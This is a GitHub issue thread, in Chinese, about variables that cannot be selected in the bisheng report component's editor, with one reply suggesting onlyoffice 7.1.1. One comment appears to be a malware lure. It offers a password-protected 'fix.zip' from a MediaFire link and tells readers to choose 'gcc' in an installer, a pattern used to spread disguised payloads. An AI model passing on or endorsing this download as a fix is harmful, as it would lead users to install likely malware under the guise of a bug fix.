### ISSUE TITLE
report组件变量无法选中，office正常启动。

### ISSUE THREAD

**Issue by WJMismybestfriend** [dataelement/bisheng#836]
打开report组件进入编辑器界面，右侧选中inputnode，各变量点击后不显示。f12调试，看到点击灰色变量名没有接口调用。

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dolphin0618** [comment]
请先使用onlyoffice7.1.1版本
